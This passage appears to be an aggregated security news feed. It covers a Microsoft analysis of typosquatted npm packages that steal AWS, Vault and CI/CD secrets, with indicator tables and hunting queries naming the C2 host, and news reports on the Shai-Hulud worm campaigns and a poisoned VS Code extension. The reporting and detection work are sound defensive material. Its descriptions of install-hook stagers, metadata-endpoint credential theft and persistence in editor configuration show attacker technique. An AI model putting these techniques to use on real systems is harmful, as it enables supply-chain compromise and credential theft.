| @vpmdhaj/search-setup (1.0.7268) | Package | Typosquat – search engine setup |
| opensearch-security-scanner (1.0.10) | Package | Unscoped lookalike – security scanner |
| opensearch-setup (1.0.9103) | Package | Unscoped lookalike – spoofs opensearch-project repo URL |
| opensearch-setup-tool (1.0.9108) | Package | Unscoped lookalike – spoofs opensearch-project repo URL |
| opensearch-config-utility (1.0.9106) | Package | Unscoped lookalike – spoofs opensearch-project repo URL |
| search-engine-setup (1.0.9108) | Package | Unscoped lookalike – spoofs opensearch-project repo URL |
| search-cluster-setup (1.0.9104) | Package | Unscoped lookalike – spoofs opensearch-project repo URL |
| elastic-opensearch-helper (1.0.9108) | Package | Unscoped lookalike – spoofs opensearch-project repo URL |
| vpmdhaj-opensearch-setup (1.0.9102) | Package | Unscoped – author-named OpenSearch setup |
| env-config-manager (2.1.9201) | Package | Typosquat – dotenv-style config manager |
| app-config-utility (1.0.9300) | Package | Typosquat – generic app config utility |
| Indicator | Type | Description |
| vpmdhaj | npm maintainer alias | Threat actor publishing all 14 packages |
| a39155771@gmail.com | Maintainer contact email registered on npm | |
| aab.sportsontheweb[.]net | Domain | Stage-1 C2 (Gen-1 packages) |
| hxxp://aab.sportsontheweb[.]net/x.php | URL | Beacon + stage-2 payload endpoint (port 80) |
| X-Supply: 1 | HTTP header | Campaign-unique marker – high-confidence proxy detection |
| 169.254.169.254 | IP | AWS EC2 IMDSv2 endpoint queried by stage-2 |
| 169.254.170.2 | IP | AWS ECS task metadata endpoint queried by stage-2 |
| 638788AFC4F1B5860A328312CAF5895ABD5F5632D28A4F2A85B09076E270D15D | SHA-256 | preinstall.js (Gen-1 stager) |
| 77D92EFE7AF3547F71FD41D4A884872D66B1BE9499EAA637E91EAC866911694D | SHA-256 | setup.mjs (Gen-2 stager) |
| BFA149694EC6411C23936311A999163ADE54D6F38E2F4B0E3CFB8CB67BD7CFAA | SHA-256 | payload.gz (gzipped Bun stage-2) |
| opensearch_init.js | Filename | Bun-compiled stage-2 credential harvester (~195 KB) |
| ai_init.js | Filename | Alternate stage-2 filename used by some Gen-2 packages |
| payload.bin | Filename | Dropped stage-2 binary in node_modules install dir |
| __DAEMONIZED=1 | Env var | Marker set by stager when spawning detached payload |
This research is provided by Microsoft Defender Security Research with contributions from members of Microsoft Threat Intelligence.
For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog.
To get notified about new publications and to join discussions on social media, follow us on LinkedIn, X (formerly Twitter), and Bluesky.
To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.
Review our documentation to learn more about our real-time protection capabilities and see how to enable them within your organization.
The post Typosquatted npm packages used to steal cloud and CI/CD secrets appeared first on Microsoft Security Blog.
Microsoft has identified an active supply chain attack targeting the npm package ecosystem. On May 28, 2026, a single threat actor operating under the newly created maintainer alias vpmdhaj (a39155771@gmail[.]com) published 14 malicious packages within a four-hour window. The packages typosquat well-known OpenSearch, ElasticSearch, DevOps, and environment-configuration libraries, and several spoof the upstream OpenSearch project’s repository URL in their package.json to appear legitimate. Once installed, the packages harvest AWS credentials, HashiCorp Vault tokens, and CI/CD pipeline secrets from the host environment.
All packages in the cluster ship the same install-time stager and the same Bun-compiled second-stage payload – a ~195 KB credential harvester purpose-built for cloud and CI/CD environments. The payload runs silently during npm install and targets credentials across Amazon Web Services, HashiCorp Vault, GitHub Actions, and the npm registry itself, enabling both cloud lateral movement and downstream supply-chain pivoting through stolen npm publish tokens. Based on our investigation and feedback to the npm team these repos and users were taken down.
Key capabilities observed in the campaign include automatic execution via npm lifecycle hooks, two distinct stager generations (an HTTP-C2 variant and a stealthier variant that abuses the legitimate Bun runtime distribution), AWS Instance Metadata Service (IMDSv2) and ECS task-role theft, AWS Secrets Manager enumeration across 16+ regions, HashiCorp Vault token harvesting, and theft of npm publish tokens for follow-on supply-chain attacks.
The vpmdhaj cluster spans 14 scoped and unscoped packages that all mimic the @opensearch / @elastic ecosystem. The attack proceeds through:
The actor adopted three social-engineering techniques designed to drive installs by mistake or trust transference. First, lookalike naming – names such as opensearch-setup, opensearch-setup-tool, opensearch-config-utility, elastic-opensearch-helper, search-engine-setup, and env-config-manager mimic well-known cluster-management and configuration libraries. Second, spoofed upstream metadata – every unscoped package sets its package.json homepage, repository, and bugs fields to the legitimate github.com/opensearch-project/opensearch-js project. Third, inflated version numbers – releases jump straight to 1.0.7265, 1.0.9108, or 2.1.9201 to suggest a long, mature release history.
Every package in the cluster declares an automatic install-time hook in package.json. The malicious code executes the moment a victim runs npm install – no require() from victim code is needed. Two stager variants were observed:
preinstall.js collects rich host context – hostname, platform, arch, Node version, USER/USERNAME, cwd, INIT_CWD, npm_package_name, npm_package_version – base64-encodes the JSON, and POSTs it to the actor’s C2 with a campaign-unique header X-Supply: 1. The same C2 endpoint then serves a gunzip-compressed second-stage binary, which is written to payload.bin in the package install directory, chmod 0755’d, and spawned detached.
The package’s index.js re-launches the same payload.bin on every subsequent require() of the module – a quiet persistence mechanism that survives across CI build stages and developer rebuild loops. The module also exports a benign-looking object falsely identifying itself as @opensearch/setup.
In newer versions, the actor replaced the noisy HTTP-C2 design with a stealthier loader that eliminates the install-time C2 round-trip entirely. setup.mjs (a) checks whether bun is already present on the host; (b) if not, downloads the legitimate Bun runtime v1.3.13 from github.com/oven-sh/bun/releases for the correct platform/arch (Linux x64/musl/aarch64, macOS x64/arm64, Windows x64/arm64); (c) extracts the ZIP using unzip, PowerShell Expand-Archive, or a hand-rolled ZIP parser; and (d) executes the pre-bundled second-stage payload (opensearch_init.js or ai_init.js) that ships inside the npm tarball.
This design reduces visibility for defenders that primarily monitor unusual outbound traffic during package installation.
The second-stage binary is a single-file Bun-compiled JavaScript binary of approximately 195 KB, purpose-built for cloud and CI/CD secret theft. Static review of the bundle identifies routines that target secrets across five platforms:
Microsoft recommends the following mitigations to reduce the impact of this threat:
Microsoft Defender Antivirus detects and blocks the malicious components on access. During reproduction in our analysis environment, setup.mjs was automatically quarantined the moment the tarball was extracted to disk.
Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog.
| Tactic | Observed activity | Microsoft Defender coverage |
| Initial Access / Execution | Suspicious script execution during npm install or package lifecycle activity | Microsoft Defender Antivirus -Trojan:JS/ShaiWorm -Trojan:JS/ObfusNpmJs -Backdoor:JS/SupplyChain Microsoft Defender for Endpoint – Suspicious usage of Bun runtime – Suspicious installation of Bun runtime – Suspicious Node.js process behavior Microsoft Defender XDR – Suspicious file creation in temporary directory by node.exe – Suspicious Bun execution from Node.js process |
| Credential Access | Potential harvesting of AWS, Vault, GitHub Actions, and npm tokens from CI/CD runners | Microsoft Defender for Endpoint – Credential access attempt – Suspicious cloud credential access by npm-cached binary – AWS Instance Metadata Service access from suspicious process Microsoft Defender for Cloud – Possible IMDS abuse from container workload – Anomalous Secrets Manager enumeration across regions |
| Command and Control | Outbound HTTP beacon with X-Supply: 1 header to attacker-controlled C2 | Microsoft Defender for Endpoint – Connection to a custom network indicator (aab.sportsontheweb[.]net) – Suspicious outbound HTTP from npm install context |
| Persistence | Re-spawn of payload.bin on every require() of compromised package | Microsoft Defender for Endpoint – Detached child process spawned by node.exe with __DAEMONIZED=1 |
The following sample queries let you search for a week’s worth of events. To explore up to 30 days of raw data, go to the Advanced Hunting page > Query tab, and update the time range to Last 30 days.
Hunt for suspicious npm lifecycle script execution involving vpmdhaj packages.
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName in~ ("node.exe", "node", "npm.cmd", "npm.exe", "npx.cmd", "npx.exe")
| where ProcessCommandLine has_any ("preinstall", "postinstall", "install")
| where ProcessCommandLine has_any (
"@vpmdhaj", "opensearch-setup", "opensearch-setup-tool",
"opensearch-config-utility", "opensearch-security-scanner",
"search-engine-setup", "search-cluster-setup",
"elastic-opensearch-helper", "vpmdhaj-opensearch-setup",
"env-config-manager", "app-config-utility")
| project Timestamp, DeviceName, FileName, ProcessCommandLine,
InitiatingProcessFileName, InitiatingProcessCommandLine, AccountName
Hunt for the stage-2 payload artifact on disk.
DeviceFileEvents
| where Timestamp > ago(7d)
| where FileName =~ "payload.bin"
| where FolderPath has "node_modules"
| project Timestamp, DeviceName, FolderPath, FileName,
InitiatingProcessFileName, InitiatingProcessCommandLine, AccountName
Hunt for detached payload execution with the campaign environment marker.
DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessCommandLine has "__DAEMONIZED=1"
or InitiatingProcessCommandLine has "__DAEMONIZED=1"
| project Timestamp, DeviceName, FileName, ProcessCommandLine,
InitiatingProcessFileName, InitiatingProcessCommandLine
Hunt for Gen-2 loader: Bun runtime download from GitHub Releases by Node.js.
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where InitiatingProcessFileName in~ ("node.exe", "node")
| where RemoteUrl has "github.com/oven-sh/bun/releases/download"
| project Timestamp, DeviceName, RemoteUrl, RemoteIP,
InitiatingProcessFileName, InitiatingProcessCommandLine, AccountName
Hunt for C2 beacon to attacker infrastructure.
DeviceNetworkEvents
| where Timestamp > ago(30d)
| where RemoteUrl has "aab.sportsontheweb.net"
or RemoteUrl has "sportsontheweb.net"
| project Timestamp, DeviceName, RemoteUrl, RemoteIP,
InitiatingProcessFileName, InitiatingProcessCommandLine, AccountName
Hunt for AWS IMDS / ECS metadata access from Node.js processes.
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where InitiatingProcessFileName in~ ("node.exe", "node", "bun.exe", "bun")
| where RemoteIP in ("169.254.169.254", "169.254.170.2")
| project Timestamp, DeviceName, RemoteIP, RemoteUrl,
InitiatingProcessFileName, InitiatingProcessCommandLine, AccountName
Affected npm packages – all published by maintainer vpmdhaj on 2026-05-28:
| Indicator | Type | Description |
| @vpmdhaj/elastic-helper (1.0.7269) | Package | Typosquat – ElasticSearch/OpenSearch helper |
| @vpmdhaj/devops-tools (1.0.7267) | Package | Typosquat – DevOps tools / OpenSearch setup |
| @vpmdhaj/opensearch-setup (1.0.7267) | Package | Typosquat – OpenSearch setup utility |
| @vpmdhaj/search-setup (1.0.7268) | Package | Typosquat – search engine setup |
| opensearch-security-scanner (1.0.10) | Package | Unscoped lookalike – security scanner |
| opensearch-setup (1.0.9103) | Package | Unscoped lookalike – spoofs opensearch-project repo URL |
| opensearch-setup-tool (1.0.9108) | Package | Unscoped lookalike – spoofs opensearch-project repo URL |
| opensearch-config-utility (1.0.9106) | Package | Unscoped lookalike – spoofs opensearch-project repo URL |
| search-engine-setup (1.0.9108) | Package | Unscoped lookalike – spoofs opensearch-project repo URL |
| search-cluster-setup (1.0.9104) | Package | Unscoped lookalike – spoofs opensearch-project repo URL |
| elastic-opensearch-helper (1.0.9108) | Package | Unscoped lookalike – spoofs opensearch-project repo URL |
| vpmdhaj-opensearch-setup (1.0.9102) | Package | Unscoped – author-named OpenSearch setup |
| env-config-manager (2.1.9201) | Package | Typosquat – dotenv-style config manager |
| app-config-utility (1.0.9300) | Package | Typosquat – generic app config utility |
| Indicator | Type | Description |
| vpmdhaj | npm maintainer alias | Threat actor publishing all 14 packages |
| a39155771@gmail.com | Maintainer contact email registered on npm | |
| aab.sportsontheweb[.]net | Domain | Stage-1 C2 (Gen-1 packages) |
| hxxp://aab.sportsontheweb[.]net/x.php | URL | Beacon + stage-2 payload endpoint (port 80) |
| X-Supply: 1 | HTTP header | Campaign-unique marker – high-confidence proxy detection |
| 169.254.169.254 | IP | AWS EC2 IMDSv2 endpoint queried by stage-2 |
| 169.254.170.2 | IP | AWS ECS task metadata endpoint queried by stage-2 |
| 638788AFC4F1B5860A328312CAF5895ABD5F5632D28A4F2A85B09076E270D15D | SHA-256 | preinstall.js (Gen-1 stager) |
| 77D92EFE7AF3547F71FD41D4A884872D66B1BE9499EAA637E91EAC866911694D | SHA-256 | setup.mjs (Gen-2 stager) |
| BFA149694EC6411C23936311A999163ADE54D6F38E2F4B0E3CFB8CB67BD7CFAA | SHA-256 | payload.gz (gzipped Bun stage-2) |
| opensearch_init.js | Filename | Bun-compiled stage-2 credential harvester (~195 KB) |
| ai_init.js | Filename | Alternate stage-2 filename used by some Gen-2 packages |
| payload.bin | Filename | Dropped stage-2 binary in node_modules install dir |
| __DAEMONIZED=1 | Env var | Marker set by stager when spawning detached payload |
This research is provided by Microsoft Defender Security Research with contributions from members of Microsoft Threat Intelligence.
For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog.
To get notified about new publications and to join discussions on social media, follow us on LinkedIn, X (formerly Twitter), and Bluesky.
To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.
Review our documentation to learn more about our real-time protection capabilities and see how to enable them within your organization.
The post Typosquatted npm packages used to steal cloud and CI/CD secrets appeared first on Microsoft Security Blog.
GitHub said late Tuesday that internal repositories were exfiltrated after an employee device was compromised through a poisoned Visual Studio Code extension, an incident that underscores the growing risks facing software development platforms and the ecosystems built around third-party developer tools.
The Microsoft-owned company said in posts on X that it detected and contained the compromise, removed the malicious extension version, isolated the affected endpoint and began an incident response investigation. The company’s current assessment is that the activity involved GitHub-internal repositories only.
GitHub also said a claim from TeamPCP, a hacking group behind attacks targeting software development packages, that 3,800 repositories were impacted was “directionally consistent” with its investigation so far. It said critical secrets were rotated Tuesday, with the highest-impact credentials prioritized first. The company said it continued to analyze logs, validate secret rotation and monitor for follow-on activity.
The company has not publicly named the extension involved or attributed the activity to a particular group. TeamPCP reportedly advertised the material for sale on a cybercrime forum and threatened to release it if no buyer emerged.
Information surfaced Wednesday that the incident may be related to a separate issue with Nx Console, a Visual Studio Code tool that helps engineering teams organize large codebases, coordinate build pipelines and run tests efficiently. According to a security advisory posted on GitHub, one of the Nx Console maintainers was compromised in a prior security incident that leaked their GitHub credentials. An attack then used those credentials to push a malicious version of the extension to the VS Code Marketplace. Those credentials have since been temporarily revoked.
With millions of installs, Nx Console is a fixture of professional JavaScript development. It is exactly the kind of tool that sits deep inside a developer’s working environment, which would have direct access to source code, credentials and build systems.
NX CEO Jeff Cross posted on X Wednesday that his company has been working with Microsoft to determine the full scope of the incident.
“Initially, Microsoft indicated to us that there were 28 installs of the malicious version 18.95.0. Based on our own analytics for the compromised version, we currently believe the number of users who received the malicious package may be significantly higher; potentially over 6k installs,” the post reads.
“This is my top priority right now,” Cross continued. “Our team has been, and continues to be focused on understanding exactly what happened, helping affected users, hardening our systems and release processes, and being as transparent as possible throughout the investigation.”
The episode also follows a series of supply chain attacks involving npm, PyPI, Docker and other developer ecosystems. In those incidents, attackers have often targeted maintainers, packages or credentials rather than attacking end users directly. The multiple attacks show how fragile development environments have become as threat actors increasingly target them. A single compromised developer account, package, extension or build process can create access to many downstream systems.
GitHub has said it has no evidence that customer data stored outside the affected repositories was affected.
Visual Studio Code extensions are widely used by developers to add functions to Microsoft’s code editor, including support for programming languages, testing tools, cloud services and artificial intelligence assistants. Because these extensions often operate inside development environments, a malicious or compromised extension can be positioned close to source code, credentials and build systems.
“The thing people underestimate about VS Code extensions is that they have full access to everything on the developer’s machine,” Charlie Eriksen, a security researcher at Aikido Security, told CyberScoop. “EDR doesn’t cover this layer at all. What’s missing for most organisations is any kind of visibility into what’s actually running on developer machines and the ability to control it.”
Trojanized extensions have appeared in the VS Code Marketplace before. Security researchers have identified malicious extensions posing as legitimate development tools, including packages used to steal credentials, mine cryptocurrency or exfiltrate data. Some have accumulated large installation counts before removal, reflecting the difficulty of policing open plugin ecosystems at scale.
For GitHub, the breach comes amid broader scrutiny of the security of developer infrastructure. The platform sits at the center of software production for companies, governments, open-source maintainers and independent developers. Its internal systems and code are of obvious interest to attackers because GitHub’s services support code hosting, package distribution, automation and identity workflows across much of the software industry.
GitHub said it would publish a fuller report when the investigation is complete.
Update: May 20, 12:55 p.m.: This story has been updated with information about a related security incident with Nx Console.
The post GitHub says internal repositories were impacted in poisoned VS Code extension attack appeared first on CyberScoop.
A rapidly spreading malware campaign has infected hundreds of software packages across major open-source registries, embedding credential-stealing code into development tools downloaded millions of times a week.
The attack, referred to as “mini Shai-Hulud,” targeted prominent software libraries, including TanStack, UiPath, and MistralAI. TanStack’s React Router package alone accounts for more than 12 million weekly downloads, placing the malicious code deep within the software supply chain of modern enterprise applications.
In a blog post, Tanstack said security teams have pulled all compromised software versions from the registry. While there is no evidence that registry passwords were stolen, experts urge anyone who downloaded the affected tools Monday to immediately change all connected cloud, server, and developer credentials — including Amazon Web Services, Google Cloud, and GitHub.
The incident highlights a systemic vulnerability in automated software publishing. The compromised updates successfully bypassed two-factor authentication and carried cryptographically valid provenance signatures. These signatures verified that the packages originated from the correct continuous integration pipelines, but failed to detect that the pipelines themselves had been manipulated to authorize malicious code.
Security researchers attribute the campaign to TeamPCP, a cloud-focused cybercriminal group that emerged in late 2025 that specializes in automating supply-chain attacks and exploiting cloud-native infrastructure, including Docker and Kubernetes environments. The group, alleged to be responsible for earlier development of Shai Hulud, quietly slips their malware into trusted software updates, allowing them to infect thousands of companies at once without triggering security alarms.
The group is notorious for its advanced ability to hide its tracks — such as disguising stolen data as anonymous messaging traffic — and its aggressive extortion tactics, which include threatening to completely erase victims’ computers if they attempt to remove the hackers’ access.
Attackers triggered the automated release process using an “orphaned commit” — code pushed to a repository fork without a corresponding branch. This allowed them to exploit overly broad permissions in GitHub Actions workflows. The malware was then delivered via a concealed dependency that fetched a heavily obfuscated 2.3-megabyte payload disguised as an initialization module.
Upon execution, the malware uses Bun — a high-speed software engine designed to run JavaScript — to systematically steal security keys and passwords. It targets high-level cloud infrastructure, including AWS, Google Cloud Platform, Kubernetes, and HashiCorp Vault. The code is engineered to infiltrate highly secure Amazon cloud networks. At the same time, it scours the developer’s local computer for secret files and SSH keys used to unlock other corporate systems.
Operating as a self-propagating worm, it publishes copies of itself to those projects, spoofing its activity to appear as automated commits from the Anthropic Claude bot. In a secondary extortion measure, the malware generates a new registry token containing a ransom note in its description, threatening a destructive computer wipe if the victim attempts to revoke the compromised access.
Despite the malware’s properties, researchers told CyberScoop they have not seen it spread.
“We saw very limited community spread,” said Charlie Eriksen, a security researcher with application security firm Aikido Security.
To maintain continuous access to developer workstations, the malware embeds itself into the configuration files of popular developer tools, notably Visual Studio Code and Anthropic’s Claude Code. This ensures the malicious scripts execute automatically every time a developer opens a project or initiates an AI coding session.
Stephen Thoemmes, senior developer advocate at Snyk, told CyberScoop this is a particular blind spot for these types of attacks.
“Directories like .claude/ and .vscode/ are typically excluded from version control via .gitignore and are rarely scrutinized as viable attack surfaces,” Thoemmes said. “While these hook and task systems provide valuable automation for legitimate work, they offer a silent execution environment for malicious code. To counter this, developers must move away from treating these local configurations as benign and begin applying the same rigorous security auditing to their tooling directories as they would to their production infrastructure.”
To avoid detection, the stolen data is exfiltrated using Session — an anonymous messaging app that bounces data across a decentralized network. By disguising the theft as ordinary, encrypted chat traffic, the hackers blend in with normal network activity. This allows the attackers to completely ditch the traditional “command” servers that corporate security teams usually hunt for and block.
The success of the “Mini Shai-Hulud” campaign exposes a major blind spot in software security: Current defenses check where an update comes from, but not if the code inside is actually safe. By hijacking the developers’ own automated systems, attackers were able to stamp their malware with official digital signatures — proving that attackers can bypass modern safeguards simply by turning a company’s own tools against them.
Socket CEO Feross Aboukhadijeh told CyberScoop that organizations should look for signs that a compromised package version was installed in CI/CD or developer environments, unexpected outbound connections to campaign infrastructure, suspicious changes in package lockfiles, unusual package publishes from their own maintainers or CI systems, and persistence artifacts in developer tooling directories.
“There is no single centralized kill switch for this kind of campaign,” Aboukhadjieh said. “The hard part is that by the time a malicious package is confirmed, it may already have been installed inside the exact environments attackers want most: developer machines and CI runners. You can pull a package from the registry, but you cannot automatically pull back the credentials it may have already stolen.”
While these packages are maintained by volunteers, Eriksen said the incident is a huge issue for enterprises due to how many development teams use the software in their products and services.
“This is not a ‘volunteer’ vs corporate thing,” Eriksen told CyberScoop. “This is an all-of-society problem.”
Aboukhadjieh told CyberScoop that these continuing attacks on popular open-source software packages is part of “a larger reckoning over how the software industry consumes open source.”
“This campaign shows how thin the line has become between a developer tool and critical infrastructure,” he said. “When attackers compromise tools that are already trusted inside build systems, they do not have to break into every company directly. They can ride the trust those tools already have.”
The post ‘Mini Shai-Hulud’ malware compromises hundreds of open-source packages in sprawling supply-chain attack appeared first on CyberScoop.
The compromised Lightning and Intercom packages have a combined monthly download count of nearly 10 million.
The post 1,800 Hit in Mini Shai-Hulud Attack on SAP, Lightning, Intercom appeared first on SecurityWeek.
The Mini Shai-Hulud attack introduced a preinstall hook to fetch and execute a Bun binary and bypass security monitoring.
The post SAP NPM Packages Targeted in Supply Chain Attack appeared first on SecurityWeek.
Tied to a fresh Checkmarx supply chain attack claimed by TeamPCP, the incident references the Shai-Hulud worm.
The post Bitwarden NPM Package Hit in Supply Chain Attack appeared first on SecurityWeek.
At least 187 code packages made available through the JavaScript repository NPM have been infected with a self-replicating worm that steals credentials from developers and publishes those secrets on GitHub, experts warn. The malware, which briefly infected multiple code packages from the security vendor CrowdStrike, steals and publishes even more credentials every time an infected package is installed.
Image: https://en.wikipedia.org/wiki/Sandworm_(Dune)
The novel malware strain is being dubbed Shai-Hulud — after the name for the giant sandworms in Frank Herbert’s Dune novel series — because it publishes any stolen credentials in a new public GitHub repository that includes the name “Shai-Hulud.”
“When a developer installs a compromised package, the malware will look for a npm token in the environment,” said Charlie Eriksen, a researcher for the Belgian security firm Aikido. “If it finds it, it will modify the 20 most popular packages that the npm token has access to, copying itself into the package, and publishing a new version.”
At the center of this developing maelstrom are code libraries available on NPM (short for “Node Package Manager”), which acts as a central hub for JavaScript development and provides the latest updates to widely-used JavaScript components.
The Shai-Hulud worm emerged just days after unknown attackers launched a broad phishing campaign that spoofed NPM and asked developers to “update” their multi-factor authentication login options. That attack led to malware being inserted into at least two-dozen NPM code packages, but the outbreak was quickly contained and was narrowly focused on siphoning cryptocurrency payments.
Image: aikido.dev
In late August, another compromise of an NPM developer resulted in malware being added to “nx,” an open-source code development toolkit with as many as six million weekly downloads. In the nx compromise, the attackers introduced code that scoured the user’s device for authentication tokens from programmer destinations like GitHub and NPM, as well as SSH and API keys. But instead of sending those stolen credentials to a central server controlled by the attackers, the malicious nx code created a new public repository in the victim’s GitHub account, and published the stolen data there for all the world to see and download.
Last month’s attack on nx did not self-propagate like a worm, but this Shai-Hulud malware does and bundles reconnaissance tools to assist in its spread. Namely, it uses the open-source tool TruffleHog to search for exposed credentials and access tokens on the developer’s machine. It then attempts to create new GitHub actions and publish any stolen secrets.
“Once the first person got compromised, there was no stopping it,” Aikido’s Eriksen told KrebsOnSecurity. He said the first NPM package compromised by this worm appears to have been altered on Sept. 14, around 17:58 UTC.
The security-focused code development platform socket.dev reports the Shai-Halud attack briefly compromised at least 25 NPM code packages managed by CrowdStrike. Socket.dev said the affected packages were quickly removed by the NPM registry.
In a written statement shared with KrebsOnSecurity, CrowdStrike said that after detecting several malicious packages in the public NPM registry, the company swiftly removed them and rotated its keys in public registries.
“These packages are not used in the Falcon sensor, the platform is not impacted and customers remain protected,” the statement reads, referring to the company’s widely-used endpoint threat detection service. “We are working with NPM and conducting a thorough investigation.”
A writeup on the attack from StepSecurity found that for cloud-specific operations, the malware enumerates AWS, Azure and Google Cloud Platform secrets. It also found the entire attack design assumes the victim is working in a Linux or macOS environment, and that it deliberately skips Windows systems.
StepSecurity said Shai-Hulud spreads by using stolen NPM authentication tokens, adding its code to the top 20 packages in the victim’s account.
“This creates a cascading effect where an infected package leads to compromised maintainer credentials, which in turn infects all other packages maintained by that user,” StepSecurity’s Ashish Kurmi wrote.
Eriksen said Shai-Hulud is still propagating, although its spread seems to have waned in recent hours.
“I still see package versions popping up once in a while, but no new packages have been compromised in the last ~6 hours,” Eriksen said. “But that could change now as the east coast starts working. I would think of this attack as a ‘living’ thing almost, like a virus. Because it can lay dormant for a while, and if just one person is suddenly infected by accident, they could restart the spread. Especially if there’s a super-spreader attack.”
For now, it appears that the web address the attackers were using to exfiltrate collected data was disabled due to rate limits, Eriksen said.
Nicholas Weaver is a researcher with the International Computer Science Institute, a nonprofit in Berkeley, Calif. Weaver called the Shai-Hulud worm “a supply chain attack that conducts a supply chain attack.” Weaver said NPM (and all other similar package repositories) need to immediately switch to a publication model that requires explicit human consent for every publication request using a phish-proof 2FA method.
“Anything less means attacks like this are going to continue and become far more common, but switching to a 2FA method would effectively throttle these attacks before they can spread,” Weaver said. “Allowing purely automated processes to update the published packages is now a proven recipe for disaster.”
